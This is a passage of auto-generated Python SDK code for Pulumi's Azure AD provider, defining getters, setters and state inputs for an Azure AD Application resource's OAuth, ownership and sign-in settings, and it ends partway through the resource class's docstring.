@pulumi.getter(name="fallbackPublicClientEnabled")
def fallback_public_client_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the application is a public client. Appropriate for apps using token grant flows that don't use a redirect URI. Defaults to `false`.
"""
return pulumi.get(self, "fallback_public_client_enabled")
@fallback_public_client_enabled.setter
def fallback_public_client_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "fallback_public_client_enabled", value)
@property
@pulumi.getter(name="featureTags")
def feature_tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationFeatureTagArgs']]]]:
"""
A `feature_tags` block as described below. Cannot be used together with the `tags` property.
"""
return pulumi.get(self, "feature_tags")
@feature_tags.setter
def feature_tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationFeatureTagArgs']]]]):
pulumi.set(self, "feature_tags", value)
@property
@pulumi.getter(name="groupMembershipClaims")
def group_membership_claims(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Configures the `groups` claim issued in a user or OAuth 2.0 access token that the app expects. Possible values are `None`, `SecurityGroup`, `DirectoryRole`, `ApplicationGroup` or `All`.
"""
return pulumi.get(self, "group_membership_claims")
@group_membership_claims.setter
def group_membership_claims(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "group_membership_claims", value)
@property
@pulumi.getter(name="identifierUris")
def identifier_uris(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of user-defined URI(s) that uniquely identify an application within its Azure AD tenant, or within a verified custom domain if the application is multi-tenant.
"""
return pulumi.get(self, "identifier_uris")
@identifier_uris.setter
def identifier_uris(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "identifier_uris", value)
@property
@pulumi.getter(name="logoImage")
def logo_image(self) -> Optional[pulumi.Input[str]]:
"""
A logo image to upload for the application, as a raw base64-encoded string. The image should be in gif, jpeg or png format. Note that once an image has been uploaded, it is not possible to remove it without replacing it with another image.
"""
return pulumi.get(self, "logo_image")
@logo_image.setter
def logo_image(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "logo_image", value)
@property
@pulumi.getter(name="marketingUrl")
def marketing_url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the application's marketing page.
"""
return pulumi.get(self, "marketing_url")
@marketing_url.setter
def marketing_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "marketing_url", value)
@property
@pulumi.getter(name="oauth2PostResponseRequired")
def oauth2_post_response_required(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether, as part of OAuth 2.0 token requests, Azure AD allows POST requests, as opposed to GET requests. Defaults to `false`, which specifies that only GET requests are allowed.
"""
return pulumi.get(self, "oauth2_post_response_required")
@oauth2_post_response_required.setter
def oauth2_post_response_required(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "oauth2_post_response_required", value)
@property
@pulumi.getter(name="optionalClaims")
def optional_claims(self) -> Optional[pulumi.Input['ApplicationOptionalClaimsArgs']]:
"""
An `optional_claims` block as documented below.
"""
return pulumi.get(self, "optional_claims")
@optional_claims.setter
def optional_claims(self, value: Optional[pulumi.Input['ApplicationOptionalClaimsArgs']]):
pulumi.set(self, "optional_claims", value)
@property
@pulumi.getter
def owners(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of object IDs of principals that will be granted ownership of the application. Supported object types are users or service principals. By default, no owners are assigned.
"""
return pulumi.get(self, "owners")
@owners.setter
def owners(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "owners", value)
@property
@pulumi.getter(name="preventDuplicateNames")
def prevent_duplicate_names(self) -> Optional[pulumi.Input[bool]]:
"""
If `true`, will return an error if an existing application is found with the same name. Defaults to `false`.
"""
return pulumi.get(self, "prevent_duplicate_names")
@prevent_duplicate_names.setter
def prevent_duplicate_names(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "prevent_duplicate_names", value)
@property
@pulumi.getter(name="privacyStatementUrl")
def privacy_statement_url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the application's privacy statement.
"""
return pulumi.get(self, "privacy_statement_url")
@privacy_statement_url.setter
def privacy_statement_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "privacy_statement_url", value)
@property
@pulumi.getter(name="publicClient")
def public_client(self) -> Optional[pulumi.Input['ApplicationPublicClientArgs']]:
"""
A `public_client` block as documented below, which configures non-web app or non-web API application settings, for example mobile or other public clients such as an installed application running on a desktop device.
"""
return pulumi.get(self, "public_client")
@public_client.setter
def public_client(self, value: Optional[pulumi.Input['ApplicationPublicClientArgs']]):
pulumi.set(self, "public_client", value)
@property
@pulumi.getter(name="requiredResourceAccesses")
def required_resource_accesses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationRequiredResourceAccessArgs']]]]:
"""
A collection of `required_resource_access` blocks as documented below.
"""
return pulumi.get(self, "required_resource_accesses")
@required_resource_accesses.setter
def required_resource_accesses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationRequiredResourceAccessArgs']]]]):
pulumi.set(self, "required_resource_accesses", value)
@property
@pulumi.getter(name="signInAudience")
def sign_in_audience(self) -> Optional[pulumi.Input[str]]:
"""
The Microsoft account types that are supported for the current application. Must be one of `AzureADMyOrg`, `AzureADMultipleOrgs`, `AzureADandPersonalMicrosoftAccount` or `PersonalMicrosoftAccount`. Defaults to `AzureADMyOrg`.
"""
return pulumi.get(self, "sign_in_audience")
@sign_in_audience.setter
def sign_in_audience(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sign_in_audience", value)
@property
@pulumi.getter(name="singlePageApplication")
def single_page_application(self) -> Optional[pulumi.Input['ApplicationSinglePageApplicationArgs']]:
"""
A `single_page_application` block as documented below, which configures single-page application (SPA) related settings for this application.
"""
return pulumi.get(self, "single_page_application")
@single_page_application.setter
def single_page_application(self, value: Optional[pulumi.Input['ApplicationSinglePageApplicationArgs']]):
pulumi.set(self, "single_page_application", value)
@property
@pulumi.getter(name="supportUrl")
def support_url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the application's support page.
"""
return pulumi.get(self, "support_url")
@support_url.setter
def support_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "support_url", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of tags to apply to the application. Cannot be used together with the `feature_tags` block.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="templateId")
def template_id(self) -> Optional[pulumi.Input[str]]:
"""
Unique ID for a templated application in the Azure AD App Gallery, from which to create the application. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "template_id")
@template_id.setter
def template_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "template_id", value)
@property
@pulumi.getter(name="termsOfServiceUrl")
def terms_of_service_url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the application's terms of service statement.
"""
return pulumi.get(self, "terms_of_service_url")
@terms_of_service_url.setter
def terms_of_service_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "terms_of_service_url", value)
@property
@pulumi.getter
def web(self) -> Optional[pulumi.Input['ApplicationWebArgs']]:
"""
A `web` block as documented below, which configures web related settings for this application.
"""
return pulumi.get(self, "web")
@web.setter
def web(self, value: Optional[pulumi.Input['ApplicationWebArgs']]):
pulumi.set(self, "web", value)
@pulumi.input_type
class _ApplicationState:
def __init__(__self__, *,
api: Optional[pulumi.Input['ApplicationApiArgs']] = None,
app_role_ids: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
app_roles: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationAppRoleArgs']]]] = None,
application_id: Optional[pulumi.Input[str]] = None,
device_only_auth_enabled: Optional[pulumi.Input[bool]] = None,
disabled_by_microsoft: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
fallback_public_client_enabled: Optional[pulumi.Input[bool]] = None,
feature_tags: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationFeatureTagArgs']]]] = None,
group_membership_claims: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
identifier_uris: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
logo_image: Optional[pulumi.Input[str]] = None,
logo_url: Optional[pulumi.Input[str]] = None,
marketing_url: Optional[pulumi.Input[str]] = None,
oauth2_permission_scope_ids: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
oauth2_post_response_required: Optional[pulumi.Input[bool]] = None,
object_id: Optional[pulumi.Input[str]] = None,
optional_claims: Optional[pulumi.Input['ApplicationOptionalClaimsArgs']] = None,
owners: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
prevent_duplicate_names: Optional[pulumi.Input[bool]] = None,
privacy_statement_url: Optional[pulumi.Input[str]] = None,
public_client: Optional[pulumi.Input['ApplicationPublicClientArgs']] = None,
publisher_domain: Optional[pulumi.Input[str]] = None,
required_resource_accesses: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationRequiredResourceAccessArgs']]]] = None,
sign_in_audience: Optional[pulumi.Input[str]] = None,
single_page_application: Optional[pulumi.Input['ApplicationSinglePageApplicationArgs']] = None,
support_url: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
template_id: Optional[pulumi.Input[str]] = None,
terms_of_service_url: Optional[pulumi.Input[str]] = None,
web: Optional[pulumi.Input['ApplicationWebArgs']] = None):
"""
Input properties used for looking up and filtering Application resources.
:param pulumi.Input['ApplicationApiArgs'] api: An `api` block as documented below, which configures API related settings for this application.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] app_role_ids: A mapping of app role values to app role IDs, intended to be useful when referencing app roles in other resources in your configuration.
:param pulumi.Input[Sequence[pulumi.Input['ApplicationAppRoleArgs']]] app_roles: A collection of `app_role` blocks as documented below. For more information see [official documentation on Application Roles](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
:param pulumi.Input[str] application_id: The Application ID (also called Client ID).
:param pulumi.Input[bool] device_only_auth_enabled: Specifies whether this application supports device authentication without a user. Defaults to `false`.
:param pulumi.Input[str] disabled_by_microsoft: Whether Microsoft has disabled the registered application. If the application is disabled, this will be a string indicating the status/reason, e.g. `DisabledDueToViolationOfServicesAgreement`
:param pulumi.Input[str] display_name: The display name for the application.
:param pulumi.Input[bool] fallback_public_client_enabled: Specifies whether the application is a public client. Appropriate for apps using token grant flows that don't use a redirect URI. Defaults to `false`.
:param pulumi.Input[Sequence[pulumi.Input['ApplicationFeatureTagArgs']]] feature_tags: A `feature_tags` block as described below. Cannot be used together with the `tags` property.
:param pulumi.Input[Sequence[pulumi.Input[str]]] group_membership_claims: Configures the `groups` claim issued in a user or OAuth 2.0 access token that the app expects. Possible values are `None`, `SecurityGroup`, `DirectoryRole`, `ApplicationGroup` or `All`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] identifier_uris: A set of user-defined URI(s) that uniquely identify an application within its Azure AD tenant, or within a verified custom domain if the application is multi-tenant.
:param pulumi.Input[str] logo_image: A logo image to upload for the application, as a raw base64-encoded string. The image should be in gif, jpeg or png format. Note that once an image has been uploaded, it is not possible to remove it without replacing it with another image.
:param pulumi.Input[str] logo_url: CDN URL to the application's logo, as uploaded with the `logo_image` property.
:param pulumi.Input[str] marketing_url: URL of the application's marketing page.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] oauth2_permission_scope_ids: A mapping of OAuth2.0 permission scope values to scope IDs, intended to be useful when referencing permission scopes in other resources in your configuration.
:param pulumi.Input[bool] oauth2_post_response_required: Specifies whether, as part of OAuth 2.0 token requests, Azure AD allows POST requests, as opposed to GET requests. Defaults to `false`, which specifies that only GET requests are allowed.
:param pulumi.Input[str] object_id: The application's object ID.
:param pulumi.Input['ApplicationOptionalClaimsArgs'] optional_claims: An `optional_claims` block as documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] owners: A set of object IDs of principals that will be granted ownership of the application. Supported object types are users or service principals. By default, no owners are assigned.
:param pulumi.Input[bool] prevent_duplicate_names: If `true`, will return an error if an existing application is found with the same name. Defaults to `false`.
:param pulumi.Input[str] privacy_statement_url: URL of the application's privacy statement.
:param pulumi.Input['ApplicationPublicClientArgs'] public_client: A `public_client` block as documented below, which configures non-web app or non-web API application settings, for example mobile or other public clients such as an installed application running on a desktop device.
:param pulumi.Input[str] publisher_domain: The verified publisher domain for the application.
:param pulumi.Input[Sequence[pulumi.Input['ApplicationRequiredResourceAccessArgs']]] required_resource_accesses: A collection of `required_resource_access` blocks as documented below.
:param pulumi.Input[str] sign_in_audience: The Microsoft account types that are supported for the current application. Must be one of `AzureADMyOrg`, `AzureADMultipleOrgs`, `AzureADandPersonalMicrosoftAccount` or `PersonalMicrosoftAccount`. Defaults to `AzureADMyOrg`.
:param pulumi.Input['ApplicationSinglePageApplicationArgs'] single_page_application: A `single_page_application` block as documented below, which configures single-page application (SPA) related settings for this application.
:param pulumi.Input[str] support_url: URL of the application's support page.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of tags to apply to the application. Cannot be used together with the `feature_tags` block.
:param pulumi.Input[str] template_id: Unique ID for a templated application in the Azure AD App Gallery, from which to create the application. Changing this forces a new resource to be created.
:param pulumi.Input[str] terms_of_service_url: URL of the application's terms of service statement.
:param pulumi.Input['ApplicationWebArgs'] web: A `web` block as documented below, which configures web related settings for this application.
"""
if api is not None:
pulumi.set(__self__, "api", api)
if app_role_ids is not None:
pulumi.set(__self__, "app_role_ids", app_role_ids)
if app_roles is not None:
pulumi.set(__self__, "app_roles", app_roles)
if application_id is not None:
pulumi.set(__self__, "application_id", application_id)
if device_only_auth_enabled is not None:
pulumi.set(__self__, "device_only_auth_enabled", device_only_auth_enabled)
if disabled_by_microsoft is not None:
pulumi.set(__self__, "disabled_by_microsoft", disabled_by_microsoft)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if fallback_public_client_enabled is not None:
pulumi.set(__self__, "fallback_public_client_enabled", fallback_public_client_enabled)
if feature_tags is not None:
pulumi.set(__self__, "feature_tags", feature_tags)
if group_membership_claims is not None:
pulumi.set(__self__, "group_membership_claims", group_membership_claims)
if identifier_uris is not None:
pulumi.set(__self__, "identifier_uris", identifier_uris)
if logo_image is not None:
pulumi.set(__self__, "logo_image", logo_image)
if logo_url is not None:
pulumi.set(__self__, "logo_url", logo_url)
if marketing_url is not None:
pulumi.set(__self__, "marketing_url", marketing_url)
if oauth2_permission_scope_ids is not None:
pulumi.set(__self__, "oauth2_permission_scope_ids", oauth2_permission_scope_ids)
if oauth2_post_response_required is not None:
pulumi.set(__self__, "oauth2_post_response_required", oauth2_post_response_required)
if object_id is not None:
pulumi.set(__self__, "object_id", object_id)
if optional_claims is not None:
pulumi.set(__self__, "optional_claims", optional_claims)
if owners is not None:
pulumi.set(__self__, "owners", owners)
if prevent_duplicate_names is not None:
pulumi.set(__self__, "prevent_duplicate_names", prevent_duplicate_names)
if privacy_statement_url is not None:
pulumi.set(__self__, "privacy_statement_url", privacy_statement_url)
if public_client is not None:
pulumi.set(__self__, "public_client", public_client)
if publisher_domain is not None:
pulumi.set(__self__, "publisher_domain", publisher_domain)
if required_resource_accesses is not None:
pulumi.set(__self__, "required_resource_accesses", required_resource_accesses)
if sign_in_audience is not None:
pulumi.set(__self__, "sign_in_audience", sign_in_audience)
if single_page_application is not None:
pulumi.set(__self__, "single_page_application", single_page_application)
if support_url is not None:
pulumi.set(__self__, "support_url", support_url)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if template_id is not None:
pulumi.set(__self__, "template_id", template_id)
if terms_of_service_url is not None:
pulumi.set(__self__, "terms_of_service_url", terms_of_service_url)
if web is not None:
pulumi.set(__self__, "web", web)
@property
@pulumi.getter
def api(self) -> Optional[pulumi.Input['ApplicationApiArgs']]:
"""
An `api` block as documented below, which configures API related settings for this application.
"""
return pulumi.get(self, "api")
@api.setter
def api(self, value: Optional[pulumi.Input['ApplicationApiArgs']]):
pulumi.set(self, "api", value)
@property
@pulumi.getter(name="appRoleIds")
def app_role_ids(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of app role values to app role IDs, intended to be useful when referencing app roles in other resources in your configuration.
"""
return pulumi.get(self, "app_role_ids")
@app_role_ids.setter
def app_role_ids(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "app_role_ids", value)
@property
@pulumi.getter(name="appRoles")
def app_roles(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationAppRoleArgs']]]]:
"""
A collection of `app_role` blocks as documented below. For more information see [official documentation on Application Roles](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
"""
return pulumi.get(self, "app_roles")
@app_roles.setter
def app_roles(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationAppRoleArgs']]]]):
pulumi.set(self, "app_roles", value)
@property
@pulumi.getter(name="applicationId")
def application_id(self) -> Optional[pulumi.Input[str]]:
"""
The Application ID (also called Client ID).
"""
return pulumi.get(self, "application_id")
@application_id.setter
def application_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "application_id", value)
@property
@pulumi.getter(name="deviceOnlyAuthEnabled")
def device_only_auth_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether this application supports device authentication without a user. Defaults to `false`.
"""
return pulumi.get(self, "device_only_auth_enabled")
@device_only_auth_enabled.setter
def device_only_auth_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "device_only_auth_enabled", value)
@property
@pulumi.getter(name="disabledByMicrosoft")
def disabled_by_microsoft(self) -> Optional[pulumi.Input[str]]:
"""
Whether Microsoft has disabled the registered application. If the application is disabled, this will be a string indicating the status/reason, e.g. `DisabledDueToViolationOfServicesAgreement`
"""
return pulumi.get(self, "disabled_by_microsoft")
@disabled_by_microsoft.setter
def disabled_by_microsoft(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "disabled_by_microsoft", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
The display name for the application.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="fallbackPublicClientEnabled")
def fallback_public_client_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the application is a public client. Appropriate for apps using token grant flows that don't use a redirect URI. Defaults to `false`.
"""
return pulumi.get(self, "fallback_public_client_enabled")
@fallback_public_client_enabled.setter
def fallback_public_client_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "fallback_public_client_enabled", value)
@property
@pulumi.getter(name="featureTags")
def feature_tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationFeatureTagArgs']]]]:
"""
A `feature_tags` block as described below. Cannot be used together with the `tags` property.
"""
return pulumi.get(self, "feature_tags")
@feature_tags.setter
def feature_tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationFeatureTagArgs']]]]):
pulumi.set(self, "feature_tags", value)
@property
@pulumi.getter(name="groupMembershipClaims")
def group_membership_claims(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Configures the `groups` claim issued in a user or OAuth 2.0 access token that the app expects. Possible values are `None`, `SecurityGroup`, `DirectoryRole`, `ApplicationGroup` or `All`.
"""
return pulumi.get(self, "group_membership_claims")
@group_membership_claims.setter
def group_membership_claims(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "group_membership_claims", value)
@property
@pulumi.getter(name="identifierUris")
def identifier_uris(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of user-defined URI(s) that uniquely identify an application within its Azure AD tenant, or within a verified custom domain if the application is multi-tenant.
"""
return pulumi.get(self, "identifier_uris")
@identifier_uris.setter
def identifier_uris(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "identifier_uris", value)
@property
@pulumi.getter(name="logoImage")
def logo_image(self) -> Optional[pulumi.Input[str]]:
"""
A logo image to upload for the application, as a raw base64-encoded string. The image should be in gif, jpeg or png format. Note that once an image has been uploaded, it is not possible to remove it without replacing it with another image.
"""
return pulumi.get(self, "logo_image")
@logo_image.setter
def logo_image(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "logo_image", value)
@property
@pulumi.getter(name="logoUrl")
def logo_url(self) -> Optional[pulumi.Input[str]]:
"""
CDN URL to the application's logo, as uploaded with the `logo_image` property.
"""
return pulumi.get(self, "logo_url")
@logo_url.setter
def logo_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "logo_url", value)
@property
@pulumi.getter(name="marketingUrl")
def marketing_url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the application's marketing page.
"""
return pulumi.get(self, "marketing_url")
@marketing_url.setter
def marketing_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "marketing_url", value)
@property
@pulumi.getter(name="oauth2PermissionScopeIds")
def oauth2_permission_scope_ids(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of OAuth2.0 permission scope values to scope IDs, intended to be useful when referencing permission scopes in other resources in your configuration.
"""
return pulumi.get(self, "oauth2_permission_scope_ids")
@oauth2_permission_scope_ids.setter
def oauth2_permission_scope_ids(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "oauth2_permission_scope_ids", value)
@property
@pulumi.getter(name="oauth2PostResponseRequired")
def oauth2_post_response_required(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether, as part of OAuth 2.0 token requests, Azure AD allows POST requests, as opposed to GET requests. Defaults to `false`, which specifies that only GET requests are allowed.
"""
return pulumi.get(self, "oauth2_post_response_required")
@oauth2_post_response_required.setter
def oauth2_post_response_required(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "oauth2_post_response_required", value)
@property
@pulumi.getter(name="objectId")
def object_id(self) -> Optional[pulumi.Input[str]]:
"""
The application's object ID.
"""
return pulumi.get(self, "object_id")
@object_id.setter
def object_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "object_id", value)
@property
@pulumi.getter(name="optionalClaims")
def optional_claims(self) -> Optional[pulumi.Input['ApplicationOptionalClaimsArgs']]:
"""
An `optional_claims` block as documented below.
"""
return pulumi.get(self, "optional_claims")
@optional_claims.setter
def optional_claims(self, value: Optional[pulumi.Input['ApplicationOptionalClaimsArgs']]):
pulumi.set(self, "optional_claims", value)
@property
@pulumi.getter
def owners(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of object IDs of principals that will be granted ownership of the application. Supported object types are users or service principals. By default, no owners are assigned.
"""
return pulumi.get(self, "owners")
@owners.setter
def owners(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "owners", value)
@property
@pulumi.getter(name="preventDuplicateNames")
def prevent_duplicate_names(self) -> Optional[pulumi.Input[bool]]:
"""
If `true`, will return an error if an existing application is found with the same name. Defaults to `false`.
"""
return pulumi.get(self, "prevent_duplicate_names")
@prevent_duplicate_names.setter
def prevent_duplicate_names(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "prevent_duplicate_names", value)
@property
@pulumi.getter(name="privacyStatementUrl")
def privacy_statement_url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the application's privacy statement.
"""
return pulumi.get(self, "privacy_statement_url")
@privacy_statement_url.setter
def privacy_statement_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "privacy_statement_url", value)
@property
@pulumi.getter(name="publicClient")
def public_client(self) -> Optional[pulumi.Input['ApplicationPublicClientArgs']]:
"""
A `public_client` block as documented below, which configures non-web app or non-web API application settings, for example mobile or other public clients such as an installed application running on a desktop device.
"""
return pulumi.get(self, "public_client")
@public_client.setter
def public_client(self, value: Optional[pulumi.Input['ApplicationPublicClientArgs']]):
pulumi.set(self, "public_client", value)
@property
@pulumi.getter(name="publisherDomain")
def publisher_domain(self) -> Optional[pulumi.Input[str]]:
"""
The verified publisher domain for the application.
"""
return pulumi.get(self, "publisher_domain")
@publisher_domain.setter
def publisher_domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "publisher_domain", value)
@property
@pulumi.getter(name="requiredResourceAccesses")
def required_resource_accesses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationRequiredResourceAccessArgs']]]]:
"""
A collection of `required_resource_access` blocks as documented below.
"""
return pulumi.get(self, "required_resource_accesses")
@required_resource_accesses.setter
def required_resource_accesses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationRequiredResourceAccessArgs']]]]):
pulumi.set(self, "required_resource_accesses", value)
@property
@pulumi.getter(name="signInAudience")
def sign_in_audience(self) -> Optional[pulumi.Input[str]]:
"""
The Microsoft account types that are supported for the current application. Must be one of `AzureADMyOrg`, `AzureADMultipleOrgs`, `AzureADandPersonalMicrosoftAccount` or `PersonalMicrosoftAccount`. Defaults to `AzureADMyOrg`.
"""
return pulumi.get(self, "sign_in_audience")
@sign_in_audience.setter
def sign_in_audience(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sign_in_audience", value)
@property
@pulumi.getter(name="singlePageApplication")
def single_page_application(self) -> Optional[pulumi.Input['ApplicationSinglePageApplicationArgs']]:
"""
A `single_page_application` block as documented below, which configures single-page application (SPA) related settings for this application.
"""
return pulumi.get(self, "single_page_application")
@single_page_application.setter
def single_page_application(self, value: Optional[pulumi.Input['ApplicationSinglePageApplicationArgs']]):
pulumi.set(self, "single_page_application", value)
@property
@pulumi.getter(name="supportUrl")
def support_url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the application's support page.
"""
return pulumi.get(self, "support_url")
@support_url.setter
def support_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "support_url", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of tags to apply to the application. Cannot be used together with the `feature_tags` block.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="templateId")
def template_id(self) -> Optional[pulumi.Input[str]]:
"""
Unique ID for a templated application in the Azure AD App Gallery, from which to create the application. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "template_id")
@template_id.setter
def template_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "template_id", value)
@property
@pulumi.getter(name="termsOfServiceUrl")
def terms_of_service_url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the application's terms of service statement.
"""
return pulumi.get(self, "terms_of_service_url")
@terms_of_service_url.setter
def terms_of_service_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "terms_of_service_url", value)
@property
@pulumi.getter
def web(self) -> Optional[pulumi.Input['ApplicationWebArgs']]:
"""
A `web` block as documented below, which configures web related settings for this application.
"""
return pulumi.get(self, "web")
@web.setter
def web(self, value: Optional[pulumi.Input['ApplicationWebArgs']]):
pulumi.set(self, "web", value)
class Application(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api: Optional[pulumi.Input[pulumi.InputType['ApplicationApiArgs']]] = None,
app_roles: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationAppRoleArgs']]]]] = None,
device_only_auth_enabled: Optional[pulumi.Input[bool]] = None,
display_name: Optional[pulumi.Input[str]] = None,
fallback_public_client_enabled: Optional[pulumi.Input[bool]] = None,
feature_tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationFeatureTagArgs']]]]] = None,
group_membership_claims: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
identifier_uris: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
logo_image: Optional[pulumi.Input[str]] = None,
marketing_url: Optional[pulumi.Input[str]] = None,
oauth2_post_response_required: Optional[pulumi.Input[bool]] = None,
optional_claims: Optional[pulumi.Input[pulumi.InputType['ApplicationOptionalClaimsArgs']]] = None,
owners: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
prevent_duplicate_names: Optional[pulumi.Input[bool]] = None,
privacy_statement_url: Optional[pulumi.Input[str]] = None,
public_client: Optional[pulumi.Input[pulumi.InputType['ApplicationPublicClientArgs']]] = None,
required_resource_accesses: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationRequiredResourceAccessArgs']]]]] = None,
sign_in_audience: Optional[pulumi.Input[str]] = None,
single_page_application: Optional[pulumi.Input[pulumi.InputType['ApplicationSinglePageApplicationArgs']]] = None,
support_url: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
template_id: Optional[pulumi.Input[str]] = None,
terms_of_service_url: Optional[pulumi.Input[str]] = None,
web: Optional[pulumi.Input[pulumi.InputType['ApplicationWebArgs']]] = None,
__props__=None):
"""
## Import
Applications can be imported using their object ID, e.g.
```sh
$ pulumi import azuread:index/application:Application test 00000000-0000-0000-0000-000000000000
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
